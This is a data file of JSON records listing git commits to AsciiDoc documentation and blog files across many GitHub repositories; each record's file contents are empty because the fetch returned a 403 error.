{"commit":"8cedc155f299b81c120c5f0a7495864be6cf5cd7","subject":"add visual tools event","message":"add visual tools event\n","repos":"clojure\/clojure-site","old_file":"content\/events\/2022\/visual-tools-aug.adoc","new_file":"content\/events\/2022\/visual-tools-aug.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"a577317e6ca9b4f9ad0c8e515635b5dd41cde2aa","subject":"Update 1993-11-17.adoc","message":"Update 1993-11-17.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/1993-11-17.adoc","new_file":"_posts\/1993-11-17.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0896996420aeaeb042dc6f34569f3f3d8afcd872","subject":"Update 2017-03-23.adoc","message":"Update 2017-03-23.adoc","repos":"entropyz\/blog,entropyz\/blog,entropyz\/blog,entropyz\/blog","old_file":"_posts\/2017-03-23.adoc","new_file":"_posts\/2017-03-23.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/entropyz\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cfe3851d33560e7ed451b95d1a929f34c2c2f299","subject":"Update 2018-05-02-Azure-11.adoc","message":"Update 
2018-05-02-Azure-11.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-02-Azure-11.adoc","new_file":"_posts\/2018-05-02-Azure-11.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dd1a824efdbc53469044b3f904db6c5bcc19b66a","subject":"Update 2016-12-2-3-D.adoc","message":"Update 2016-12-2-3-D.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-2-3-D.adoc","new_file":"_posts\/2016-12-2-3-D.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"90a6f19c5431452fa2f412983b251e6bc12e74b0","subject":"y2b create post I got the PS4 early!","message":"y2b create post I got the PS4 early!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-11-11-I-got-the-PS4-early.adoc","new_file":"_posts\/2013-11-11-I-got-the-PS4-early.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f70ae047d6c0b21598d83932e81d3b9902889855","subject":"Added ref language to Gitbook","message":"Added ref language to 
Gitbook\n","repos":"acartapanis\/camel,lburgazzoli\/apache-camel,ssharma\/camel,acartapanis\/camel,davidkarlsen\/camel,gilfernandes\/camel,tkopczynski\/camel,nicolaferraro\/camel,prashant2402\/camel,NickCis\/camel,sverkera\/camel,driseley\/camel,objectiser\/camel,cunningt\/camel,JYBESSON\/camel,christophd\/camel,onders86\/camel,ullgren\/camel,yuruki\/camel,w4tson\/camel,gilfernandes\/camel,yuruki\/camel,w4tson\/camel,nicolaferraro\/camel,tadayosi\/camel,lburgazzoli\/camel,JYBESSON\/camel,curso007\/camel,nboukhed\/camel,prashant2402\/camel,DariusX\/camel,RohanHart\/camel,lburgazzoli\/camel,Fabryprog\/camel,jkorab\/camel,dmvolod\/camel,jonmcewen\/camel,snurmine\/camel,bhaveshdt\/camel,lburgazzoli\/apache-camel,tlehoux\/camel,mcollovati\/camel,gilfernandes\/camel,sirlatrom\/camel,punkhorn\/camel-upstream,isavin\/camel,anoordover\/camel,jkorab\/camel,zregvart\/camel,sverkera\/camel,sirlatrom\/camel,lburgazzoli\/apache-camel,JYBESSON\/camel,tadayosi\/camel,jonmcewen\/camel,gautric\/camel,veithen\/camel,dmvolod\/camel,anton-k11\/camel,kevinearls\/camel,prashant2402\/camel,gautric\/camel,punkhorn\/camel-upstream,akhettar\/camel,tkopczynski\/camel,christophd\/camel,nikhilvibhav\/camel,chirino\/camel,dmvolod\/camel,dmvolod\/camel,bhaveshdt\/camel,RohanHart\/camel,curso007\/camel,rmarting\/camel,snurmine\/camel,nikhilvibhav\/camel,rmarting\/camel,neoramon\/camel,gnodet\/camel,curso007\/camel,w4tson\/camel,acartapanis\/camel,akhettar\/camel,alvinkwekel\/camel,bhaveshdt\/camel,pkletsko\/camel,sverkera\/camel,pax95\/camel,tkopczynski\/camel,davidkarlsen\/camel,pmoerenhout\/camel,nikhilvibhav\/camel,tdiesler\/camel,lburgazzoli\/camel,neoramon\/camel,bgaudaen\/camel,DariusX\/camel,tlehoux\/camel,tadayosi\/camel,Fabryprog\/camel,allancth\/camel,jamesnetherton\/camel,hqstevenson\/camel,Thopap\/camel,pmoerenhout\/camel,gnodet\/camel,pkletsko\/camel,jkorab\/camel,pax95\/camel,kevinearls\/camel,veithen\/camel,gnodet\/camel,tdiesler\/camel,scranton\/camel,sabre1041\/camel,salikjan\/camel,mgyongyosi\/camel,tkopczynski\/camel,tlehoux\/camel,sabre1041\/camel,nboukhed\/camel,NickCis\/camel,RohanHart\/camel,rmarting\/camel,onders86\/camel,jonmcewen\/camel,prashant2402\/camel,tkopczynski\/camel,bgaudaen\/camel,NickCis\/camel,sabre1041\/camel,gilfernandes\/camel,adessaigne\/camel,kevinearls\/camel,Thopap\/camel,gautric\/camel,ssharma\/camel,cunningt\/camel,jamesnetherton\/camel,prashant2402\/camel,prashant2402\/camel,RohanHart\/camel,allancth\/camel,nboukhed\/camel,apache\/camel,Thopap\/camel,veithen\/camel,punkhorn\/camel-upstream,pkletsko\/camel,mcollovati\/camel,jkorab\/camel,Thopap\/camel,tdiesler\/camel,kevinearls\/camel,jamesnetherton\/camel,isavin\/camel,sverkera\/camel,lburgazzoli\/apache-camel,anton-k11\/camel,christophd\/camel,rmarting\/camel,dmvolod\/camel,drsquidop\/camel,davidkarlsen\/camel,chirino\/camel,apache\/camel,NickCis\/camel,pax95\/camel,akhettar\/camel,alvinkwekel\/camel,jonmcewen\/camel,cunningt\/camel,bgaudaen\/camel,pmoerenhout\/camel,gilfernandes\/camel,tadayosi\/camel,w4tson\/camel,jarst\/camel,nboukhed\/camel,chirino\/camel,neoramon\/camel,scranton\/camel,jarst\/camel,ssharma\/camel,lburgazzoli\/camel,tadayosi\/camel,tdiesler\/camel,zregvart\/camel,isavin\/camel,anton-k11\/camel,sabre1041\/camel,w4tson\/camel,yuruki\/camel,ullgren\/camel,DariusX\/camel,nicolaferraro\/camel,pkletsko\/camel,veithen\/camel,snurmine\/camel,sirlatrom\/camel,adessaigne\/camel,anton-k11\/camel,pax95\/camel,adessaigne\/camel,anoordover\/camel,CodeSmell\/camel,isavin\/camel,akhettar\/camel,bhaveshdt\/camel,anton-k1
1\/camel,pmoerenhout\/camel,tadayosi\/camel,drsquidop\/camel,snurmine\/camel,jamesnetherton\/camel,jonmcewen\/camel,pmoerenhout\/camel,pmoerenhout\/camel,apache\/camel,yuruki\/camel,bgaudaen\/camel,objectiser\/camel,gnodet\/camel,davidkarlsen\/camel,gnodet\/camel,objectiser\/camel,nicolaferraro\/camel,scranton\/camel,mcollovati\/camel,lburgazzoli\/apache-camel,driseley\/camel,chirino\/camel,hqstevenson\/camel,bgaudaen\/camel,tlehoux\/camel,mgyongyosi\/camel,alvinkwekel\/camel,apache\/camel,apache\/camel,pax95\/camel,pkletsko\/camel,Fabryprog\/camel,driseley\/camel,sverkera\/camel,Thopap\/camel,jarst\/camel,drsquidop\/camel,driseley\/camel,driseley\/camel,neoramon\/camel,onders86\/camel,DariusX\/camel,curso007\/camel,ullgren\/camel,hqstevenson\/camel,bhaveshdt\/camel,JYBESSON\/camel,gilfernandes\/camel,RohanHart\/camel,pax95\/camel,curso007\/camel,sabre1041\/camel,anoordover\/camel,JYBESSON\/camel,CodeSmell\/camel,cunningt\/camel,sirlatrom\/camel,gautric\/camel,jamesnetherton\/camel,yuruki\/camel,JYBESSON\/camel,drsquidop\/camel,isavin\/camel,sabre1041\/camel,jkorab\/camel,driseley\/camel,cunningt\/camel,RohanHart\/camel,cunningt\/camel,Fabryprog\/camel,objectiser\/camel,christophd\/camel,adessaigne\/camel,anoordover\/camel,CodeSmell\/camel,christophd\/camel,ullgren\/camel,punkhorn\/camel-upstream,zregvart\/camel,sverkera\/camel,rmarting\/camel,onders86\/camel,adessaigne\/camel,zregvart\/camel,nboukhed\/camel,onders86\/camel,nikhilvibhav\/camel,neoramon\/camel,dmvolod\/camel,jamesnetherton\/camel,allancth\/camel,allancth\/camel,veithen\/camel,CodeSmell\/camel,anoordover\/camel,acartapanis\/camel,mgyongyosi\/camel,tlehoux\/camel,yuruki\/camel,NickCis\/camel,bhaveshdt\/camel,ssharma\/camel,lburgazzoli\/camel,apache\/camel,jarst\/camel,gautric\/camel,snurmine\/camel,drsquidop\/camel,akhettar\/camel,allancth\/camel,mcollovati\/camel,tlehoux\/camel,onders86\/camel,mgyongyosi\/camel,scranton\/camel,Thopap\/camel,adessaigne\/camel,drsquidop\/camel,snurmine\/camel,anton-k11\/camel,hqstevenson\/camel,rmarting\/camel,sirlatrom\/camel,sirlatrom\/camel,scranton\/camel,NickCis\/camel,tkopczynski\/camel,isavin\/camel,lburgazzoli\/apache-camel,jarst\/camel,acartapanis\/camel,chirino\/camel,ssharma\/camel,w4tson\/camel,jkorab\/camel,pkletsko\/camel,veithen\/camel,jonmcewen\/camel,bgaudaen\/camel,acartapanis\/camel,christophd\/camel,hqstevenson\/camel,tdiesler\/camel,neoramon\/camel,scranton\/camel,chirino\/camel,curso007\/camel,kevinearls\/camel,jarst\/camel,akhettar\/camel,gautric\/camel,alvinkwekel\/camel,salikjan\/camel,ssharma\/camel,allancth\/camel,mgyongyosi\/camel,kevinearls\/camel,nboukhed\/camel,anoordover\/camel,mgyongyosi\/camel,lburgazzoli\/camel,tdiesler\/camel,hqstevenson\/camel","old_file":"camel-core\/src\/main\/docs\/ref-language.adoc","new_file":"camel-core\/src\/main\/docs\/ref-language.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/allancth\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2551a05fbca37a6e4058df5f0f0eb77ecfdfffdb","subject":"Update 2018-05-14-How-to-Build-a-PC.adoc","message":"Update 2018-05-14-How-to-Build-a-PC.adoc","repos":"rorosaurus\/hubpress.io,rorosaurus\/hubpress.io,rorosaurus\/hubpress.io,rorosaurus\/hubpress.io","old_file":"_posts\/2018-05-14-How-to-Build-a-PC.adoc","new_file":"_posts\/2018-05-14-How-to-Build-a-PC.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/rorosaurus\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c9435ae28e963a9cda715c0dcd9d8458ec79527a","subject":"CL: string-starts-with?","message":"CL: string-starts-with?\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"69e232e86ea8fbd92f5b689ce1efc9cbf1b881c3","subject":"Upgrade recipe 8","message":"Upgrade recipe 8\n","repos":"droolsjbpm\/optaplanner-website,droolsjbpm\/optaplanner-website,droolsjbpm\/optaplanner-website","old_file":"download\/upgradeRecipe\/upgradeRecipe8.adoc","new_file":"download\/upgradeRecipe\/upgradeRecipe8.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/droolsjbpm\/optaplanner-website.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7a958bdf00d12a68843493052020bb9fef5642fc","subject":"+ initial draft of README","message":"+ initial draft of README\n","repos":"cjxgm\/fancy-status,cjxgm\/fancy-status","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cjxgm\/fancy-status.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"13f4e871e0d092be580c6ad583f58ecbd3abb9c9","subject":"add readme for irc channel","message":"add readme for irc channel\n","repos":"devnull-tools\/boteco,devnull-tools\/boteco","old_file":"channels\/boteco-channel-irc\/README.adoc","new_file":"channels\/boteco-channel-irc\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/devnull-tools\/boteco.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c8bc09fe6ac2b7f977fa9da58acd6be212ea37a8","subject":"Update 2015-06-18-Mein-freiwilliges-politisches-Jahr.adoc","message":"Update 2015-06-18-Mein-freiwilliges-politisches-Jahr.adoc","repos":"hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io","old_file":"_posts\/2015-06-18-Mein-freiwilliges-politisches-Jahr.adoc","new_file":"_posts\/2015-06-18-Mein-freiwilliges-politisches-Jahr.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hoernschen\/hoernschen.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2f53d087fd57f3ee7dfadb54dfdc19ea18be3dd3","subject":"Update 2016-01-04-Java-Annotations.adoc","message":"Update 2016-01-04-Java-Annotations.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2016-01-04-Java-Annotations.adoc","new_file":"_posts\/2016-01-04-Java-Annotations.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fb438e7da2356d71d587a97ef37584a8978104d5","subject":"Update 
2017-04-21-MVC-MVP-and-MVVM.adoc","message":"Update 2017-04-21-MVC-MVP-and-MVVM.adoc","repos":"dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io","old_file":"_posts\/2017-04-21-MVC-MVP-and-MVVM.adoc","new_file":"_posts\/2017-04-21-MVC-MVP-and-MVVM.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dakeshi\/dakeshi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f75534a03e60662b91549a10e479896fa99d8d4f","subject":"y2b create post This Thing Helps You Sleep Better?","message":"y2b create post This Thing Helps You Sleep Better?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-05-29-This-Thing-Helps-You-Sleep-Better.adoc","new_file":"_posts\/2016-05-29-This-Thing-Helps-You-Sleep-Better.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d4cae63ef6402efb3261a799a04c925caf380841","subject":"Update 2018-05-28-Gas.adoc","message":"Update 2018-05-28-Gas.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-28-Gas.adoc","new_file":"_posts\/2018-05-28-Gas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b370092ae0b19a8d1fe4d2faf1184afdb2aed401","subject":"PLANNER-343 Automatic scanning","message":"PLANNER-343 Automatic scanning\n","repos":"droolsjbpm\/optaplanner-website,droolsjbpm\/optaplanner-website,oskopek\/optaplanner-website,bibryam\/optaplanner-website,oskopek\/optaplanner-website,psiroky\/optaplanner-website,droolsjbpm\/optaplanner-website,oskopek\/optaplanner-website,psiroky\/optaplanner-website,bibryam\/optaplanner-website,psiroky\/optaplanner-website,bibryam\/optaplanner-website","old_file":"download\/releaseNotes\/releaseNotes6.3.adoc","new_file":"download\/releaseNotes\/releaseNotes6.3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oskopek\/optaplanner-website.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"942df396f22f6dafbcfb11c57974c69af9e6c292","subject":"Update 2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","message":"Update 2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","new_file":"_posts\/2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0239052500717f953117b89dc9a2d4c81e356c22","subject":"Update 2017-02-07-Episode-87-Track-n-Field-Drum-Solo.adoc","message":"Update 
2017-02-07-Episode-87-Track-n-Field-Drum-Solo.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2017-02-07-Episode-87-Track-n-Field-Drum-Solo.adoc","new_file":"_posts\/2017-02-07-Episode-87-Track-n-Field-Drum-Solo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dad56a3aa72ae2b7a76215b7d8aa874e34545ee6","subject":"Fix typo","message":"Fix typo\n","repos":"funcool\/cats,alesguzik\/cats,yurrriq\/cats,tcsavage\/cats","old_file":"doc\/content.adoc","new_file":"doc\/content.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/yurrriq\/cats.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"a86e1884bf0aa8a6d8babcd4055dfc28d32f2ad4","subject":"Info on how you need city cooperation to redeploy.","message":"Info on how you need city cooperation to redeploy.\n","repos":"CityOfNewYork\/NYCOpenRecords,CityOfNewYork\/NYCOpenRecords,CityOfNewYork\/NYCOpenRecords,CityOfNewYork\/NYCOpenRecords,CityOfNewYork\/NYCOpenRecords","old_file":"docs\/groundwork.adoc","new_file":"docs\/groundwork.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/CityOfNewYork\/NYCOpenRecords.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3e7763da9fd93a00f8567bce10dca91066fab90e","subject":"Update 2017-05-29-Anaya-Blog-Episode-1.adoc","message":"Update 2017-05-29-Anaya-Blog-Episode-1.adoc","repos":"harvard-visionlab\/harvard-visionlab.github.io,harvard-visionlab\/harvard-visionlab.github.io,harvard-visionlab\/harvard-visionlab.github.io,harvard-visionlab\/harvard-visionlab.github.io","old_file":"_posts\/2017-05-29-Anaya-Blog-Episode-1.adoc","new_file":"_posts\/2017-05-29-Anaya-Blog-Episode-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/harvard-visionlab\/harvard-visionlab.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"929391bef8134b2aca76bcd0af18c4148e42e33c","subject":"KUDU-1030 Document gcc 4.6 warning","message":"KUDU-1030 Document gcc 4.6 warning\n\nChange-Id: Id256a9c5ca750dcb80f875b6c2c1d4175c4e78c6\nReviewed-on: http:\/\/gerrit.sjc.cloudera.com:8080\/8206\nReviewed-by: David Alves <33ea948168c114d220e0372a903be6ee60f6396e@cloudera.com>\nTested-by: 
jenkins\n","repos":"helifu\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,InspurUSA\/kudu,andrwng\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,andrwng\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,cloudera\/kudu,helifu\/kudu,helifu\/kudu,andrwng\/kudu,cloudera\/kudu,helifu\/kudu,andrwng\/kudu,cloudera\/kudu,cloudera\/kudu,andrwng\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,cloudera\/kudu","old_file":"docs\/installation.adoc","new_file":"docs\/installation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a0e12fb5b8f43ee040495594057c8f60233e4738","subject":"Update 2017-02-24-image-File-Reader.adoc","message":"Update 2017-02-24-image-File-Reader.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-02-24-image-File-Reader.adoc","new_file":"_posts\/2017-02-24-image-File-Reader.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b97351de6af7293027fa3474eb0b08757d1665fc","subject":"Update 2018-02-10-RTFM-Episode-0x01.adoc","message":"Update 2018-02-10-RTFM-Episode-0x01.adoc","repos":"kr-b\/kr-b.github.io,kr-b\/kr-b.github.io,kr-b\/kr-b.github.io,kr-b\/kr-b.github.io","old_file":"_posts\/2018-02-10-RTFM-Episode-0x01.adoc","new_file":"_posts\/2018-02-10-RTFM-Episode-0x01.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kr-b\/kr-b.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bbe028fb6a05c1b9faf8cff4bc86508b816566d3","subject":"OPC-UA bridge: build and setup description","message":"OPC-UA bridge: build and setup description\n","repos":"advancedtelematic\/sota_client_cpp,advancedtelematic\/aktualizr,advancedtelematic\/aktualizr,advancedtelematic\/aktualizr,advancedtelematic\/sota_client_cpp,advancedtelematic\/aktualizr","old_file":"docs\/opcua-bridge.adoc","new_file":"docs\/opcua-bridge.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/advancedtelematic\/sota_client_cpp.git\/': The requested URL returned error: 403\n","license":"mpl-2.0","lang":"AsciiDoc"} {"commit":"93a93398154a35b03be3d1459a2a448a86dbeb3e","subject":"PLANNER-431: Added links to download","message":"PLANNER-431: Added links to download\n","repos":"oskopek\/optaplanner-website,oskopek\/optaplanner-website,droolsjbpm\/optaplanner-website,droolsjbpm\/optaplanner-website,oskopek\/optaplanner-website,droolsjbpm\/optaplanner-website","old_file":"download\/download.adoc","new_file":"download\/download.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oskopek\/optaplanner-website.git\/': The requested URL returned error: 
403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"eef0d20319c2e67582fe4d46f91589131e35f472","subject":"add new master README.adoc","message":"add new master README.adoc\n","repos":"iotk\/iochibity-java,iotk\/iochibity-java,iotk\/iochibity-java,iotk\/iochibity-java,iotk\/iochibity-java,iotk\/iochibity-java,iotk\/iochibity-java","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/iotk\/iochibity-java.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"d8d686780e9847576b1e50d525fbb00e5f2f8906","subject":"add basic readme","message":"add basic readme\n","repos":"almighty\/almighty-jobs","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/almighty\/almighty-jobs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"cdd8a104b9c337e152cb78b9b21861347af39a64","subject":"Doc rewrites done","message":"Doc rewrites done\n","repos":"gravitee-io\/gravitee-policy-authentication","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gravitee-io\/gravitee-policy-authentication.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5e3c3b660bce963af10b3ec64a7f288e5052b96b","subject":"revert AsciiDoc demo deletion","message":"revert AsciiDoc demo deletion\n","repos":"PatrickTo\/ace,ggalancs\/ace,vgrish\/ace,l3dlp\/ace,bcuff\/ace,thdoan\/ace,ylian\/ace,itsff\/ace,soonhokong\/lean-ace,sbusso\/ace,shidao-fm\/ace,leanprover\/ace,mkosieradzki\/ace,STRd6\/ace,alexbarnsley\/ace,bradydowling\/ace,JanvanCasteren\/ace,2947721120\/ACE,AlphaStaxLLC\/ace,l3dlp\/ace,tbutter\/ace,gjtorikian\/ace,sbusso\/ace,XCage15\/ace,CAAL\/ace,swong15\/ace-fork,shidao-fm\/ace,gjtorikian\/ace,sevin7676\/ace,Khan\/ace,cintiamh\/ace,tranch-xiao\/ace,itsff\/ace,enricoberti\/ace,taylorleh\/ace,EthanK28\/ace,sekcheong\/ace,animack\/ace,STRd6\/ace,bcuff\/ace,cintiamh\/ace,vgrish\/ace,mlajtos\/ace,Amrit01\/ace,derekja\/ace,thsunmy\/ace,fjakobs\/ace,jabgibson\/ace,AaronZhangL\/ace,mrlong\/ace,tbutter\/ace,bradparks\/ace,mlajtos\/ace,vgrish\/ace,thsunmy\/ace,XCage15\/ace,thdoan\/ace,wende\/alchemide,EthanK28\/ace,acanakoglu\/ace,397239396\/ace,STRd6\/ace,kevinkmp\/ace,makelivedotnet\/ace,mdinger\/ace,brandonb927\/ace,likitha\/ace,eranwitkon\/ace,Mabbu9\/ace,thdoan\/ace,Stackato-Apps\/ace,thsunmy\/ace,tranch-xiao\/ace,thdoan\/ace,thdoan\/ace,AlphaStaxLLC\/ace,luvegt\/ace,multiarc\/ace,AaronZhangL\/ace,jabgibson\/ace,thdoan\/ace,vgrish\/ace,patope\/ace,WigWagCo\/ace,mdinger\/ace,swong15\/ace-fork,vgrish\/ace,wende\/alchemide,sekcheong\/ace,EthanK28\/ace,derekja\/ace,mdinger\/ace,dudb\/ace,qweasd1\/ace,IChocolateKapa\/ace,likitha\/ace,JanvanCasteren\/ace,ylian\/ace,acanakoglu\/ace,patope\/ace,qweasd1\/ace,sbusso\/ace,makelivedotnet\/ace,Gottox\/ace,swong15\/ace-fork,makelivedotnet\/ace,gjtorikian\/ace,jjatria\/ace,paladox\/ace,EthanK28\/ace,l3dlp\/ace,tranch-xiao\/ace,vgrish\/ace,alexbarnsley\/ace,tbutter\/ace,soonhokong\/lean-ace,skylarkcob\/ace,dudb\/ace,wcandillon\/ace,paladox\/ace,itsff\/ace,multiarc\/ace,fjakobs\/ace,Khan\/ace,paladox\/ace,shamim8888\/ace,tranch-xiao\/ace,ezoapp\/aceeditor,mrlong\/ace,soonhokong\/lean-ace,Khan\/ace,bradydowling\/ace,paladox\/ace,STRd6\/ace,l3dlp\
